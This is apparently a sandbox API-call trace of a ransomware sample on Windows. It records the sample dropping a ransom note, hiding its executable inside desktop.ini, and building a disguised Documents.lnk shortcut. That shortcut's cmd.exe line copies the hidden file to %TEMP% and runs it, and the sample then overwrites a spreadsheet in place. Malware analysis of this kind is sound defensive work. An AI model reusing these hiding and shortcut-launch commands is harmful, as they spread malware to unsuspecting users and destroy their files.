3 [0129.292] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0129.292] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0129.292] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0129.292] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0129.292] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0129.292] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0129.292] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x938, dwThreadId=0x8b8)) returned 1 [0129.293] CloseHandle (hObject=0x110) 
returned 1 [0129.293] CloseHandle (hObject=0x114) returned 1 [0129.294] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0xffffffff [0129.294] GetLastError () returned 0x2 [0129.294] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0129.299] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0x20 [0129.299] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0129.299] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0129.299] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0129.299] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0129.299] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0129.299] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0129.299] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: 
lpsz="[FROM_PATH]") returned 0xb [0129.299] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0129.299] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0129.299] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0129.299] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1") returned 0x19 [0129.300] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x122 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x122 [0129.300] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0129.300] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & del 
/f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0x8d4, dwThreadId=0x8d0)) returned 1 [0129.315] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0130.380] CloseHandle (hObject=0x114) returned 1 [0130.380] CloseHandle (hObject=0x110) returned 1 [0130.380] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0130.380] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0130.380] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0130.381] GetTickCount () returned 0x29a3b [0130.381] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=18716976962) returned 1 [0130.381] MultiByteToWideChar 
(in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x56\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x31\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x45\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x41\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x7a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] CompareStringW (Locale=0x409, dwCmpFlags=0x0, 
lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0130.381] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0130.381] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0130.381] CharUpperBuffW (in: lpsz="explorer.exe \"Documents\" & type \"Documents\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x63 | out: lpsz="EXPLORER.EXE \"DOCUMENTS\" & TYPE \"DOCUMENTS\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x63 [0130.381] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0130.381] CharUpperBuffW (in: lpsz="explorer.exe \"Documents\" & type \"Documents\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x64 | out: lpsz="EXPLORER.EXE \"DOCUMENTS\" & TYPE \"DOCUMENTS\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x64 [0130.381] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0130.381] CoInitialize (pvReserved=0x0) returned 0x0 [0130.382] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0130.383] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) 
returned 0x0 [0130.383] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0130.383] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0130.385] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Documents\" & type \"Documents\\desktop.ini\" > \"%TEMP%\\Vw1EwAzj.exe\" && \"%TEMP%\\Vw1EwAzj.exe\"") returned 0x0 [0130.385] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0130.385] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0130.385] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0130.385] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents.lnk", fRemember=0) returned 0x0 [0130.393] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0130.393] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0130.393] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0130.393] CoUninitialize () [0130.394] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.394] ReleaseMutex (hMutex=0xf8) returned 1 [0130.394] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.394] ReleaseMutex (hMutex=0xf8) returned 1 [0130.394] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.394] ReleaseMutex (hMutex=0xf8) returned 1 [0130.394] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.394] ReleaseMutex (hMutex=0xf8) returned 1 [0130.394] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\bUW1gWS4k.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\buw1gws4k.xlsx"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0130.394] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.394] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.395] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18718387460) returned 1 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0130.395] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4414 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3f2c [0130.396] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4414 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4414 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0130.398] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x2209, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x2209, lpOverlapped=0x0) returned 1 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0130.398] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2209, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2209, lpOverlapped=0x0) returned 1 [0130.399] SetFilePointer (in: hFile=0x114, lDistanceToMove=-8713, 
lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x220b [0130.399] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x2209, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x2209, lpOverlapped=0x0) returned 1 [0130.399] SetFilePointer (in: hFile=0x114, lDistanceToMove=-8713, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x220b [0130.399] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2209, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2209, lpOverlapped=0x0) returned 1 [0130.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bUW1gWS4k.xlsx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0130.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bUW1gWS4k.xlsx", cchWideChar=14, 